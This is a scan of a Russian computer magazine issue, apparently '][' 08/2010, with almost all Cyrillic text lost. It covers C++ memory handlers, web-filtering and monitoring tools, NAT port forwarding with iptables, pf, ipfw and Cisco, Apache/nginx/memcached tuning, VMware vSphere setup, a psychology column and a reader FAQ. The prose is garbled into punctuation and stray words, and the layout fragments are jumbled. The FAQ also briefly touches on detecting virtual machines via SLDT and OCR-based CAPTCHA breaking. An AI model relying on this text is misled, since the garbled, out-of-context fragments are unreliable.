, , ,
- , .
set_new_handler , new
.
- new bad_alloc , .
new,
X 08 /139/ 10

new
class Widget {
public:
static std::new_handler set_new_handler
(std::new_handler p) throw();
static void *operator new(std::size_t size)
throw(std::bad_alloc);
private:
static std::new_handler currentHandler;
}

new, Widget,
. -,
set_new_handler, Widget. new-handler
. operator new.
new, Widget.
, new ,
new . , new,
Widget,
new-handler.

,
.
. C++ ,
, , ,
..
,
.

. ,
, .
.
, , ,
new delete,
open source . ,
Pool Boost. ,

C++.

,
new delete. ,
.z

117

SYN/ACK
grinder grinder@synack.ru, _ssh3r1ff- ssh3r1ff@gmail.com


, , . , : !.
WINDOWS
Windows , IP- . , advfirewall
MMC ( ),
. , , .
netsh,

. netsh *.wfw,
. , advfirewall
. , IP
URL, . , IE ,
: ,
, , .
DNS.
,
IP , HOSTS ( c:\Windows\System32\drivers\etc\hosts)
. :
127.0.0.1
127.0.0.1

odnoklassniki.ru
www.odnoklassniki.ru

, , , .

, .
: NAT,
VPN-, , ,
P2P- . KWF - ,
][ 2007 ,
.
. ->
. KWF ,
,
URL HTTP FTP
. , . ,
,
, . ,
,
, - . -> URL,
URL, . , Ads/banners, Search engines,
Automatic Updates Windows Update. .
, ,
(, Social network), (URL URL)
:
odnoklassniki.ru/*

,
:
*.odnoklassniki.ru/*

KERIO WINROUTE

Kerio WinRoute, -

118

,
. , X 08 /139/ 10

, (- dostupest.ru).
HTTP
.
,

, .
-> -> HTTP.
, URL,
. , .
,
Remove advertisement and banners .
, ,
. , , ,
.
URL .
: , URL,
Web Filter ( ), ,
IP (, , ).
Social network; -.
, ,
. . ,
, , IP ( ), . KWF
.
- ( ActiveX, HTML JavaScript).
-, HTML.
, .
. X 08 /139/ 10

, ( 70),
. .
,
URL (*). ,
-, .
KWF . Kerio Web Filter, - ISS
Orange WebFilter.
58 -, . -
, 20
, , ,
. , .
, Kerio Web Filter .
FTP .
KWF , upload . ,
,
. : , IP-
, , FTP-.
, IM-
KWF . , login.icq.com, id.rambler.ru
URL, IM-. ,
IP , ,
][ 2009 .
,
, , Instant Messengers,
IP:
- Rambler ICQ: 81.19.64.0 - 81.19.66.255;
- icq-ws.rambler.ru: 81.19.69.0 - 81.19.70.255;

119

SYN/ACK

Windows
- ICQ: 64.12.0.0 - 64.12.255.255, 205.188.0.0 205.188.255.255

.
. (ICQ Deny), -> IP-,
Instant Messengers. .
. ,
.
. , , , ,
. , ail-
2041, 2042; Yahoo! Messenger 5000-5001, 5050; MSN 1863;
Jabber/Gtalk 5222, 5223; IRC 6667-6669.
.
P2P.
-P2P , .
,
P2P ( 120 ).
, ,
. , - -

007

: .
. ,
, - .
LanAgent (lanagent.ru). ,
, , . ,
, ,
.
, , ICQ e-mail, , ,
, . .
,
.

120

URL Kerio WinRoute


,
. P2P, ,
,
. , -P2P.
: , eDonkey, DC++, Gnutella, Kazaa
. , Kerio
DNS ( DNS) IP, . : vkontakte.
ru 127.0.0.1.
.

SURFANALYZER
SurfAnalyzer (surfanalyzer.ru) ,
,
. ,
,
, (.exe, .com,
.zip ..), , IM-, . , , , ,
.

e-mail ICQ. SurfAnalyzer , ,
, :
(Server) , - ( , ,
, IM),
( ), Firebird
; ;
(View)
e-mail, ICQ -;
(Admin)
,
.

SurfAnalyzer
- (UserGte, WinGate ..)
-
X 08 /139/ 10

URL ,
View. , ,
, . ,
:).

SurfAnalyser
SurfAnalyzer, . SurfAnalyzer.
SurfAnalyzer ,
Win2k/XP/2k3. : CPU 1.7 , 256 RAM 200 HDD.
; , Firebird,
. ServiceManager.
SurfAnalyzer Admin, Admin .
, IP.
.
-, (Web+ICQ),
SurfAnalyzer (
3128), POP3 SMTP, . ,
-. , -, .. IP- SurfAnalyzer.

. e-mail-,
SurfAnalyzer, . ,
.
, , Web + ICQ + Mail Agent. SurfAnalyzer IP, IP+.

, , IP- -. ,
, .
: . , MIME-.

. ,
.
MIME-/ . ,
SurfAnalyzer,
. -
URL, SurfAnalyzer.
, : ,
. , odnoklassniki. ,
. IP.
SurfAnalyzer
, ICQ + Mail Agent. ,
X 08 /139/ 10

TRAFFPRO
TraffPro (traffpro.ru)
.
, ( Panasonic LG), ,
, NAT, -,
c- Squid. IP,
, , LDAP/AD VPN.
. TraffPro Qt, MySQL,
gnuplot.
Linux, Windows Linux, -.
, Free-, .
,
.
Linux LAMP- (. ][ 12.2008) .
,

, . ,

. , Linux,
iptables (TraffPro iptables
/etc/traffpro/traffpro_rule.cfg).
LAN2NET FIREWALL
Lan2net NAT Firewall (lan2net.ru)
,
, ,
.
, , , Microsoft Small Business Specialist.
Lan2net ,
,
URL IP.
IP firewall
. () IP-.
, IP-
.
. URL,
.
'*',
, .
: *.mp3, *.avi, *.mpg .. z

LanAgent NetworkFilter
, , SurfAnalyzer
LanAgent NetworkFilter,
: ICQ, MSN, mail.ru
; ;
. , -.
.

121

SYN/ACK
j1m@synack.ru

,
, , , -/-, DNAT/PAT.
, .
, -
NAT.
IPv4
. ,
, , ,
, NAT.

IP-, ,
IP-.
, NAT', ,
, . , -, SMTP- FTP-,
IP- - . DNAT , -
. ,

. ,
, .

,
, Windows ,
.
, .
,
,
. :
, ,
,
.
WINDOWS
, , .
Windows.
NAT:

122

1. -> ,
, IP- -> NAT.
2. NAT .
3. ,
.
4. , (, ), .

LINUX
Linux ,
iptables/netfilter, .
DNAT,
PREROUTING.
:
iptables -t nat -A PREROUTING -p tcp --dst $GATE \
--dport $PORT -j DNAT --to-destination $SERVER:$PORT

$GATE , $PORT ,
$SERVER:$PORT . ,
, (
):
# echo 1 > /proc/sys/net/ipv4/ip_forward

:
$IPTABLES -t nat
--dport $PORT
$IPTABLES -t nat
--dport $PORT

-A
-j
-I
-j

PREROUTING -p tcp --dst $IP \


DNAT --to-destination $SERVER:$PORT
POSTROUTING -p tcp --dst $SERVER \
SNAT --to $IP

, .
iptables-, ,
, Debian, arno-iptables-firewall,

. , 80
192.168.0.100, NAT_TCP_
X 08 /139/ 10

FORWARD="80>192.168.0.100" /etc/arno-iptables-firewall/
firewall.conf :
$ sudo /etc/init.d/arno-iptables-firewall restart

FREEBSD
FreeBSD , NAT ( , ).
natd , ,
, ,
.
kernel nat, NAT,
FreeBSD. , ipfw.
, , . kernel nat
FreeBSD ,
, ,
. ,
: natd, divert --. NAT
natd :
1. natd ipfw /etc/rc.conf:
# vi /etc/rc.conf
# natd
natd_enable="YES"
# rl0
natd_interface="rl0"
natd_flags="-f /etc/natd.conf"
# ipfw
firewall_enable="YES"
firewall_type="/etc/ipfw.conf"

2. NAT /etc/natd.conf:
# vi /etc/natd.conf
same_ports yes
X 08 /139/ 10

use_sockets yes
# :
# ---: --
redirect_port tcp 192.168.0.100:80 80

3. , (rl1) ,
natd , divert
/etc/ipfw.conf:
ipfw add divert natd ip from any to any in via rl1

:
ipfw allow tcp from any to 192.168.0.100 \
dst-port 80 in via rl0 setup

.
: NAT. NAT ,
- .
, ,
80-
:
# vi /etc/ipfw.conf
# NAT
nat 1 config log if rl1 reset same_ports \
redirect_port tcp 192.168.0.100:80 80
# NAT
add nat 1 ip from any to any via rl1

'nat' , , natd. ,
same_ports NAT
( RPC-). rdirect_port
, /etc/natd.conf.

123

SYN/ACK

DD-Wrt
OPENBSD
,
OpenBSD. NAT
pf,
ipfw , , iptables.
80- pf :
# vi /etc/pf.conf
# NAT
nat on rl1 from 192.168.10.0/24 to any -> $out_ip
#
rdr on rl1 inet proto { tcp, udp } from any \
to $out_ip port 80 -> 192.168.0.100

, rl1 , 192.168.0.100
, out_ip .
, , 80-,
port
.
, , ,
- :
rdr on rl1 inet proto { tcp, udp } from any \
to $out_ip port 5000:10000 -> 192.168.0.100

. .: , bittorrent:
rdr on $ext_if inet proto tcp from any to $ext_if \
port 6881:6889 -> $myhost port 6881:6889
pass in quick on $ext_if inet proto tcp from any \
to $myhost port 6880 >< 6890 keep state

,
,
.
: pass -

Universal Plug and Play (UPnP) ,


.
,

. .

124


D-Link DIR-300
rdr ,
,
(.
SQL-).
.
, OpenBSD 4.7
:
pass out on rl1 from 192.168.0.0/24 to any \
nat-to $out_ip
pass in on rl1 proto tcp from any to any \
port 80 rdr-to 192.168.0.100

CISCO


Cisco. , ,
, , .
, Cisco PIX (Private Internet Exchange)
ASA (Adaptive Security Appliance)
:
static (inside,outside) tcp 1.2.3.4 www \
192.168.0.100 www netmask 255.255.255.255

, Cisco IOS, :
ip nat inside source static tcp 192.168.0.100 80 \
1.2.3.4 80

80
192.168.0.100 1.2.3.4.
, /
.

OPENWRT DD-WRT
, Cisco

. - , D-Link,
ASUS, Linksys .
OpenWrt, X-Wrt DD-wrt,
X 08 /139/ 10

OpenBSD, pf NAT

, ,
Destination Ports, . Save.
,
/etc/config/firewall :
forward:proto=tcp dport=80:192.168.0.100:80

SQL-
. , .
DD-Wrt
-. ,
- (192.168.1.1),
NAT/QoS, . , ,
www, - , TCP
UDP, IP- , -
. , , .
, ,
(), ( VPN/PPTP).
, , ppp0, VPN/PPTP, .
DD-Wrt. .,
iptables:
iptables -t nat -A PREROUTING -p tcp -i ppp0 \
--dport 80 -j DNAT --to 192.168.0.100:80

. .
- X-Wrt,
, , OpenWrt.
Network, Firewall, New Rule
Forward Add. Forward To IP-
, Port
. Protocol
Add, : TCP UDP. ,
X 08 /139/ 10



, , ,
FreeBSD.
( , , Minix
:)). SSH.
, . , ,
. , NAT',
, . ,
-. SSH-,
. ? .
(serverip , gateway-ip ):
$ ssh -L 8080:<server-ip>:80 user@<gateway-ip>

, 8080 80 . -
localhost:8080, , . SSH-
SSH- ,
80 .
,
.
rinetd ,
.
Linux- BSD-.
/etc/rinetd.conf
(/usr/local/etc/rinetd.conf), :
1.2.3.4 80 192.168.0.100 80

() :
$ sudo /etc/init.d/rinetd restart

Ubuntu :

125

SYN/ACK

X-Wrt

# /usr/local/etc/rc.d/rinetd start

FreeBSD. FreeBSD rinetd


:
# echo "rinetd_enable="YES"" >> /etc/rc.conf

, 80 1.2.3.4,
IP-
192.168.0.100.
UNIX- socket
- inetd. ,
, . /etc/inetd.conf (

UDP-
NAT

pwnat (http://samy.pl/pwnat/)
, NAT-,
, NAT, .
, , pwnat.

192.168.0.2
HighID eDonkey-:
# vi /etc/pf.conf
rdr pass on $ext_if inet proto tcp
to any port 4661 -> 192.168.0.2
rdr pass on $ext_if inet proto tcp
to any port 4662 -> 192.168.0.2
rdr pass on $ext_if inet proto udp
to any port 4665 -> 192.168.0.2
rdr pass on $ext_if inet proto udp
to any port 4672 -> 192.168.0.2

126

Windows 2003 Server


xinetd,
) :
1 stream tcp nowait root /usr/local/bin/socket
socket 192.168.0.100 2

1 -, 2
192.168.0.100.
(www, ftp ..),
( ), /etc/services.
inetd kill -HUP
. , /etc/hosts.allow.
.

from any \
from any \
from any \
from any \

, DNAT ,
,
. ,

, . z
X 08 /139/ 10

SYN/ACK
j1m@synack.ru



-
- ,
. ,
, . , , ,
. ,
, .
- ,
. ,
,
. , , , .
,
, .
, -,
- -,
PHP' CMS. , . , ,
, . ,
,
( ). ,
.
, - .
:
Apache;
PHP;
eAccelerator;
Nginx -;
Memcached;
.

APACHE
- ,
, Apache. , HTTP-,
-,
-.
: Apache , . . , HTTP- :
Apache ,

( LoadModule). X 08 /139/ 10

,
.
Apache

. Apache2 , ,

MPM. - (Multi-processing module),
HTTP-. :
1. prefork MPM, -, Apache 1.3.
. ,
. .
2. worker MPM, .
, . .
prefork, .
3. event MPM. ,
, , nginx.
MPM, ( ).

Apache, MPM,
apache2-mpm.
Apache MaxClients.
,
, ,
,
. ,
, Apache, ( ps top).
HTTP-, Apache
keep-alive,
/ . Keep-alive ,
, CSS
.
, .

127

SYN/ACK

KeepAliveTimeout 5-10 , ,
, HTML/PHP,
keep-alive , KeepAlive
Off.
Apache . , , , ,
.
(, ,
GPRS), ,
, .

PHP
HTTP-, ,
-.
- PHP,
. /etc/php5/
apache2/php.ini ( Ubuntu,
) :
memory_limit -
.
.
display_errors = Off, error_log = /var/log/php log-. ,
.
upload_max_filesize post_max_size POST-. ,
-.
PHP-.
EACCELERATOR
PHP . , ,
, PHP-, . ,
,
. ,

128

eAccelerator,
PHP , . PHP-
( ).
eAccelerator ,
.
:
$ sudo apt-get install php5-dev build-essential

eAccelerator:
$ cd /tmp/
$ wget http://bart.eaccelerator.net/source/0.9.6.1/
eaccelerator-0.9.6.1.tar.bz2
$ tar xvjf eaccelerator-0.9.6.1.tar.bz2
$ cd eaccelerator-0.9.6.1
$ phpize
$ ./configure --enable-eaccelerator=shared
$ make
$ sudo make install

:
$ sudo mkdir -p /var/cache/eaccelerator
$ sudo chmod 0777 /var/cache/eaccelerator

, , eAccelerator PHP ( ):
# vi /etc/php5/apache2/php.ini
[PHP]
;
extension = "eaccelerator.so"
eaccelerator.enable = "1"
; ()
eaccelerator.shm_size = "64"
;
eaccelerator.cache_dir = "/var/cache/eaccelerator"
X 08 /139/ 10

Apache MPM- Ubuntu

phpinfo() eAccelerator

Nginx
;
eaccelerator.optimizer = "1"
;
eaccelerator.check_mtime = "1"
;
eaccelerator.debug = "0"
; ( )
eaccelerator.filter = ""
;
eaccelerator.shm_max = "0"
;
1 (3600 )
eaccelerator.shm_ttl = "3600"
eaccelerator.shm_prune_period = "0"
; ,
eaccelerator.shm_only = "0"
;
eaccelerator.compress = "1"
eaccelerator.compress_level = "9"

NGINX
, - , Apache .

Round robin DNS .


IP- .
, :
,
.
X 08 /139/ 10

, , HTTP-. Apache
, -
, ,
HTTP- , . HTTP- Nginx Apache
. Apache, Nginx
,
HTTP-.
,
(
HTTP-). Nginx ,
,
, Apache
Nginx . .
/etc/apache2/ports.conf :
NameVirtualHost *:81
Listen 81

Nginx:
$ sudo apt-get install nginx

:
# vi /etc/nginx/nginx.conf
# Nginx-
user www-data;
# Nginx-

worker_processes 1;
error_log /var/log/nginx/error.log;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
http {

129

SYN/ACK

Memcached slab-

#
include /etc/nginx/mime.types;
default_type application/octet-stream;
server_names_hash_bucket_size 64;
access_log /var/log/nginx/access.log;
sendfile on;
#tcp_nopush on;
#keepalive_timeout 0;
keepalive_timeout 65;
tcp_nodelay on;

INFO

info


Gzip Deflate ,
Gzip-

.

Nginx Apache

#
gzip on;
gzip_proxied any;
gzip_min_length 1100;
gzip_http_version 1.0;
gzip_buffers 4 8k;
gzip_comp_level 9;
gzip_types text/plain text/css application/
x-javascript text/xml application/xml
application/xml+rss text/javascript;
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}

:
# vi /etc/nginx/sites-enabled/host.com
server {
listen 80;
server_name host.com;
access_log /var/log/nginx.access_log;
# Nginx
location ~* \.(jpg|jpeg|gif|png|css|js|zip|
tgz|gz|rar|bz2|doc|xls|exe|pdf|ppt|tar|wav|bm
p|rtf|swf|ico|flv|txt|xml|docx|xlsx)$ {
root /var/www/host.com/;
index index.html index.php;
access_log off;
expires 30d;
}
# .htaccess
location ~ /\.ht {
deny all;
}
#
Apache
location / {
proxy_pass http://127.0.0.1:81/;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-for $remote_

130

addr;
proxy_set_header Host $host;
proxy_connect_timeout 60;
proxy_send_timeout 90;
proxy_read_timeout 90;
proxy_redirect off;
proxy_set_header Connection close;
proxy_pass_header Content-Type;
proxy_pass_header Content-Disposition;
proxy_pass_header Content-Length;
}
}

, Apache Nginx:
$ sudo service apache2 restart
$ sudo service nginx restart

MEMCACHED
Memcached
, .

- , API. memcached
, , ,
, . -
PHP-,
( ) memcached,
- ( , nginx),

memcached. memcached
- ,
.
:
1. memcached:
$ sudo apt-get install memcached

2. server nginx
:
# vi /etc/nginx/nginx.conf
location / {
# memcached, URI
set $memcached_key $uri;
# memcached
memcached_pass 127.0.0.1:11211;
X 08 /139/ 10

-
Nginx :)
#
default_type text/html;
#
error_page 404 = /fallback;
}
location /fallback {
proxy_pass backend;
}

3. PHP memcache (
memcached):
$ sudo pecl install memcache

4. :
$ vi smaple.php
# memcached
ob_start();
$html = ob_get_clean();
$memcache->set($_SERVER['REQUEST_URI'], $html);
echo $html;

, ,
-. ,
. , , .
. .

SSI (Server Side Includes). SSI -
, -
. , SSI,
- :
# vi /var/www/index.php
<html>
<body>

memcached


memcached '-L'.

.
memcached

.
X 08 /139/ 10

<!--# include virtual="/auth.php" -->


<!--# include virtual="/body.php" -->
</body>
</html>

,
auth.php, body.php.
,
. :
1. .
- nginx.
2. nginx index.php - (Apache), SSI- *2* -
(auth.php body.php).
3. , Apache PHP-
, ( ) body.php memcached.
4. nginx, index.
php .
5. , index.php - (, ,
nginx), Apache
auth.php, body.php memcached.
, SSI nginx ssi on,
location /. , auth.php ,
,
memcached.


-,
. ,
:
1. gzip deflate .
HTTP-: ngx_http_gzip_module
nginx, mod_compress lighttpd mod_deflate Apache.
2.
HTML JavaScript ( ,
.., , web-optimizator,
code.google.com/p/web-optimizator).
3. CSS JavaScript- ,
(
,
).
4. CSS , JavaScript .
6. Expires Cache-control,
CSS JavaScript .
7. JPG PNG , GIF (,
).z

131

SYN/ACK
grinder grinder@synack.ru

VMWARE VSPHERE

. - . , ,
VMware .
, : Microsoft, Oracle
Corporation, Parallels, VMware . ,
,
, - . ,
(SaaS, Software as a
service, ), ,
. VMware vSphere.

VSPHERE
VMware vSphere (www.vmware.com/products/
vsphere) , 2009 .
,
VMware Virtual Infrastructure,
. vSphere , ,
,
.
. . Google, Microsoft Azure Amazon,
, . vSphere

,
. ,
VMware,
.
,
:
VMware vStorage Thin Provisioning ; ;
VMware VMsafe ,
;
VMware API vStorage vCenter Data Recovery
VM ;
VMware Hot Add
;
VMware Distributed Power Management , ;
VMware Host Profiles , -

132

VMware ESX/ESXi . vNetwork,


,
VMware VMotion,
High Availability Fault Tolerance,
VMware DRS,
Storage VMotion. vSphere ,
(, )
(, Veeam Backup, www.veeam.com). CPU, RAM
(Resource Pool), (Reservation). , VMware,
VMware Compatibility Guide, Windows *nix. vSphere, Virtual
Infrastructure, ,
, (
); CPU.
6 ( Advanced Enterprise
Plus 12), .
, .
VMware vSphere :
VMware ESX / VMware ESXi (
);
VMware vCenter Server Agent, VMware vCenter Server ( VMware
VirtualCenter Server);
vCenter Server, , ( );
, ,
.
VMware
vSphere 4 update 2, .

VSPHERE
, ,
.

VM .
X 08 /139/ 10

vSphere,
:
VMware
Hardware Compatibility List;
VMware vSphere ESX/ESXi Server
(22 64 bit CPU, 2+ RAM, 2+
HDD);
VMware vCenter Server vSphere Client
ESX(i)-;
SAN;
.
,
( , SAN,
Active Directory ).
,
www.vmware.com/support/
pubs/vs_pubs.html.
vSphere, , . ,
,
ESX VMware ESXi, VMware vCenter Server (
ISO- zip-). : Server Heartbeat, Data Recovery (CD ISO)
vShield Zones. , ,
VMware ESXi, .
VMware ESX ESXi, , Linux ( ),
, .
: ,
.
, - vSphere Client. - ,
ESX(i) vCenter.
VMware vCenter
Windows.
, XP,
2k8R2. vCenter ,
(5 , 50 )
X 08 /139/ 10

Microsoft SQL Server 2005 Express,



.
. (
250), 32- . :

32- XP SQL Express,
64-
SQL-. ISO- zip-,

vCenter Server. , : vSphere Client, vCenter
Guided Consolidation, vCenter Update Manager, vCenter
Converter, vCenter Orchestrator VMware Consolidated
Backup. .

, , . , vCenter
-,
IIS . ,
: http,
https, LDAP, SSL, heartbeat. , , (.Net, J# .)
. vCenter
(Linked Mode)

. standalone
, vCenter Server Linked
Mode Options Join a VMware
vCenter Server group ...
vCenter. , ,
. ,
,
.
, vCenter Installer, , , . ,
, .
vCenter Update Manager (vCUM)
IP- vCenter .
, ,

HTTP://WWW
links
VMware
vSphere vmware.
com/products/vsphere


vSphere
vmware.com/
support/pubs/vs_pubs.
html.

64- CPU
CPU
Identification,
www.vmware.com/
download/shared_
utilities.html.

133

SYN/ACK

VMware ESXi

standalone- vCenter
Server

, , , VMware
Hardware Compatibility List (vmware.com/go/hcl). ,
-: VM Help (vm-help.com/
esx40i/esx40_whitebox_HCL.php), VMware's Communities
List (communities.vmware.com/cshwsw.jspa) Ultimate ESX
Whitebox (ultimatewhitebox.com).

- VMware Go

. :
Database Information , Windows-. ,
, ,
( 20 ).
Destination Folder Configure the location for downloading
patches. vSphere Client, , (
: Pentium II 300, 200 RAM 1 HDD).


. vSphere Client,
( Use Windows session credential

PowerShell

GUI,

. , ,
GUI. VMware
PowerShell PowerCLI (vmware.com/go/powercli).
,
Connect-VIServer, Get-VM Get-VICommand.
PowerShell. , , VMware Project Onyx
(blogs.vmware.com/vipowershell/2009/11/project-onyx-ishere.html), PowerShell-, VMware vSphere Client.
PowerCLI blogs.
vmware.com/vipowershell.

134

), .
. , , .
. Home Inventory Host and Clusters,
.
vSphere, Home.
:
Inventory , , datacenter,
;
Administration , , , vSphere, ;
Management ,
, .
, .
; - , ,
. -, - , vSphere
. , ,
. , .
,
. ,
. Administration Licensing,
Manage vSphere Licenses. Add License Keys. , Assign Licenses
Change License Key.
ESX(i).
DataCenter, .
DataCenter Add a host.
, IP /
; ,
.
. , . , Summary
. Configuration,
X 08 /139/ 10

INFO

info

vSphere Client

VM


, ,
.
. TCO/ROI-,
VM,
(TCO Total
Cost of Ownership , ROI Return on investment ).
VMware www.vmware.
com/calculator , , , ,
: , ,
.
:
( VMotion, iSCSI, NFS ), , .

. New Cluster,
. HA (High Availability)
DRS (Distributed Resource Scheduler). ,


.
, VM (Manual, Partially, Full
automated) ( Conservative Aggressive).
(DPM),
, EVC (Enhanced VMotion
Compatibility), -.
, EVC . ,
, , ,
SSE. ,
VMotion
, ? EVC
,
, VM . EVC AMD- Intel-.

. , ,
X 08 /139/ 10

vSphere
EVC . ,
. :
. ,
, Next .
Deploy
OVF Template, Open Virtualization Format
, (,
,
VMware OVF Tool). .
.
. Migrate
, .
,
,
- . vSphere
,
Administration Roles 9 , .

.


.
Fault Tolerance (VMFT,
, VM), Storage vMotion
(SVMotion, VM
), ,
.
(vmwareelearning.
blip.tv, youtube.com/user/VMwareKB, youtube.com/user/
VMwareELearning). z

vSphere
:
Standard, Advanced
Enterprise.

Essentials
Essentials Plus,


.

()
vNetwork





(
).



vSphere
.
VMware
Go (go.vmware.com)


VMware ESXi

.

vSphere
80,
389, 443, 636, 902/903,
8080 8443.

135

UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:

- ,
: , , , . , , , . , ,
,
, .
, .
?

,
, ;
,
, .
:). ,
, ,
.
, :
. ( :) );
;
( );
- , ;
,
;
. ,
, ,
.
,
.


,
, .
,
, . ,

136

, ,
,

,

.
, ,
.

.


.
. : ,
,
, . ,
, ;
. ,
,
, . .

( ,
. ,
- -

).
: , ,

.
,
30%
.
( , ):
,
, ,
. -
.
: ,
?.
:
, - -
10- . ,

,
,

.
.
, , -: , ,
. ,
,
X 08 /139/ 10

: ,
,

,
, :
: ,
?.

,
. : -


, .
, :

, .
.
, ,
.
,
,
,
.
, , .


,
- , , ,

. ;
.
, -;
,
.

-, .
: -, , . -
, 1-2 .
10
.
-, .

. , , ,
, , , - , ,
, ,
.
, . ,
,
X 08 /139/ 10

,
,
, , . , .
, 3 !
() ?

, ?
?
?
; , , .
?

,
.



, ,
, .
, ,
, .
: ,
, . .
, . , -.
, ,
.

,
.

(
) (
).

(-,
, ).

,
. 5
: 1.

,
.
, , ,
-..., ..
, ,
, ,
,
,
,
,

( , ..) , ,
, .

.
,
,
.
:).

137

UNITS

VS
. ? ,
.
, .
, / . , , , , .

,
.
.
, ,
: ,
.
,

,

. ,
100%. ,
,
:
,

, .


, .
.

. .
:
? , ?
, Delphi, ?
, .
,
. : -,
,
,
2 .
, ,
, ?
. ,
.
. ,
, ,
-
.

138


- : , , , , .
, ,
. , ,

,
. ,
( , );
, .

, ,
, ,
. ,
,

, . ,
- , ,
, , ,
,
,
, .
? ,
, :
. ,
, ?.
,
. ,
.

, -
-, ,

. ,
- , -
, .
(, IT-) ,
, ;
, ,
.
,
,

.
.


, -
, .
,
, ,
,
(
, ),
,
.
,
.


. ,
, , , .
, ;
, .
,
,
,
.
-.
: ,
,
. : ,

, .
, ,

, ,
,
.
: ,
, .

. ,
,
. .

,
, . , ,
.
,

- ,
.
:
, .


, , , .
,
.
X 08 /139/ 10

,
,
,
(,
):
, , ,
;
,
;
: , , , , ;
,
,
,
;
,
;
,
.
, .

.
:
-
,
.
= , ,
.
, .
,

. ,
, PR-
? ,
. ,
. ,
.
, .
:

, .
? :) ,
. , ,

X 08 /139/ 10

.


. , , ,
. ! ,

,
.
:
, ;

. ,
, , ;
( )
. ,
;
50- ,
( . !) .

,
.

(
) ,
, :
,
. :
?
:
1. ;
2. ;
3. .
:
1. , , , ?
2. ,
,
. ,

, ?
3.
,
,

, ,

,
,

( ! ?);
(
,

,
, ).
, , .
AOL Internet is a good
thing Internet is a bad thing (
YouTube ) ,
.
. ,
,
, . ,
, -
; .
.
,
;
.
.
- ; , .
, ,

.
-, , , ,
,
.
,
, ,

.

, ,
. ,
; , ,
, ,
, .
, , PR- (
PR, ),
, ,
.
.
. ][
:).z

139

UNITS
ant

faq
united
@real.xakep.ru

Q:
Windows

ProDiscover (www.techpathways.com/
DesktopDefault.aspx?tabindex=3&tabid=12).

/ egg- (
Python) :

,
.

Q:

Python'?

, , ,

A: , , , ,
setuptools. -
pypi.python.org/pypi/
setuptools.

:
1. setuptools easy_install,

exe.
.
.
2. :
easy_install [ ].
. ,

MAC (Modified, Access, and Change)


.
.
?

A: MFT (
, ),

mac-robber (www.sleuthkit.org).
mac-robber ,
MAC
. The Sleuth Kit
(TSK), .
: MFT, , TSK

140

easy_install example.com/path/to/
MyPackage-1.2.3.tgz.

Q: , PDF-
, , ,
.
.

A:
PDF Scanner (blogs.paretologic.
com/malwarediaries/CL_PDF_Scanner.zip).
PDF,
:
1. nothing found ( );
2. potential risk JavaScript code (
JS-, );
3. suspicious file (
, , , ). , ,
X 08 /139/ 10

malwaredomainlist.
com mdl.paretologic.com.
Q: , Skype - IRC.
?

A: Skype
IRC-. GUI-,
.
:
/add [username]
username .
/leave .
/topic [text] .
/get guidelines
guideline',
/kick [username]
.
/kickban [username] , kick
.
/set /set banlist
, .
/set /get allowlist
,
.
/setrole [username] MASTER | USER |
LISTENER
.
: Skype? CREATOR MASTER . USER
. LISTENER ,
.
Q:
,

HDD

#f00)
circle.attr("fill", "#f00");


Raphael , . ,
, ,
JavaScript ,
Flash. HTML 5.

Flash-
Silverlight-. ,

Q: PCAP-

JavaScript. ?

A: ,
,
Raphael (raphaeljs.com). W3G
SVG,
Vector Markup Language ( ). ,
, Raphael, DOM-.
JavaScript,
, .

:
// 320 x
200
10, 50
var paper = Raphael(10, 50, 320,
200);
// x,y
= (50, 40) = 10
var circle = paper.circle(50, 40,
10);
// (X 08 /139/ 10

A: , , .
.
,
IP-. , ,
,
nwmap (nwmap.sourceforge.net).
Nmap
Tshark.
Q: : embedded-, . ,
USB-
. - . NTFS, ,
, . , FAT ,
. , ?
A: , FAT/
FAT32.
,
.
HP USB Disk Storage Format Tool PE2USB.

,
Google.
Q: , .
,
( VMware
Workstation) .
.
.
,
?

A: ,
,
LDTR.
,
, . Windows
,
LDTR
. ,
VMware . :
LDTR, , ,

.
SLDT (Store
Local Descriptor Table Register),

ring-3 .
:

SLDT ,
.
Q: : CAPTCHA . ,

141

UNITS

,
$fname.
,
SQL Injection.
Interpolique, . :
$conn->query(eval(b('select * from
table where fname=^^fname;')));

b -
base64-
, ^^.
:

JavaScript
: l, 1, I. ,
, ?

Q:
: [A-Z][a-z][0-9]
.
, ,
:
,
. ,
,
. :
l, 1, I
;
W, w w v vv;
O,0, Q ,
;
g, 9 , ;
3, 8 B;
4 A;
5 S;
L V;
r n;
h n;
Y, y, v
.
,
.
Q:
CAPTCHA. -,
, ,
OCR, -
,
CAPTCHA?

A: , ,
, OCR-. ,
, ,
.
GOCR (jocr.sourceforge.net) OCR-,

142

. ,
, .
Tesseract (code.google.com/p/tesseract-ocr)
OCR-,
HP 1985 1995
. , ,
,
, GOCR.
ocropus (code.google.com/p/ocropus)
Tesseract , Google :). ,
, .
Gamera (ldp.library.jhu.edu/projects/gamera)
,
( CAPTCHA),
.
Q: , SQL-.

A: (, )
-.
WAF
][ (www.xakep.ru/magazine/xa/130/056/1.
asp). ,
, SQL-,
Interpolique.
,
DNS. Interpolique
,
, base64 .
?
,
.
,
.
:
$conn->query("select * from table
where fname=^^fname;");

select * from table where


fname=b64d("Veh.....=")

-
. fname ( , ),
-, , .
www.scribd.com/
doc/33001026/Interpolique. , ,

base64 MySQL.
PostgreSQL base64
encode/decode.
Q: SHSH, iPhone/iPad,
?
?

A: Apple , ,
, . ,
.
, firmware Apple
- , Jailbreak (
). iPhone, iPod Touch
iPad, iTunes
Apple,
ECID (
) .
SHSH

iBoot, .
iBoot , .
SHSH? :
Apple,

( Jailbreak),
,
.
,
SHSH, - Apple. SHSH TinyUmbrella
(thefirmwareumbrella.blogspot.com).z
X 08 /139/ 10

>Multimedia
Ashampoo Snap 4.0.0
Evernote 3.5.4
Flashcards 2.2.5
Fotobounce 3.0.3
Foxit Reader 4.0
GameSave Manager
Gimp 2.6.9
Google Earth 5.2
Gramps 3.2.3

>Misc
BatteryBar Free 3.4.1
CLCL 1.1.2
Folder Bookmarks 1.6.5.1
gMote 1.41
Launchy 2.5
Listary
OnTopReplica
Piles
Preme 0.92
TimeSheet 1.1.5
TriX 0.0.11.17
USB Stick Watcher 1.5
Windows 7 Shortcuts 0.4.2

>Dailysoft
7-Zip 4.65
DAEMON Tools Lite 4.35.6
Download Master 5.7.2.1217
Far Manager v2.0 build 1420 x86
FileZilla Client 3.3.3
Firefox 3.6.6
foobar2000 1.0.3
K-Lite Mega Codec Pack 6.10
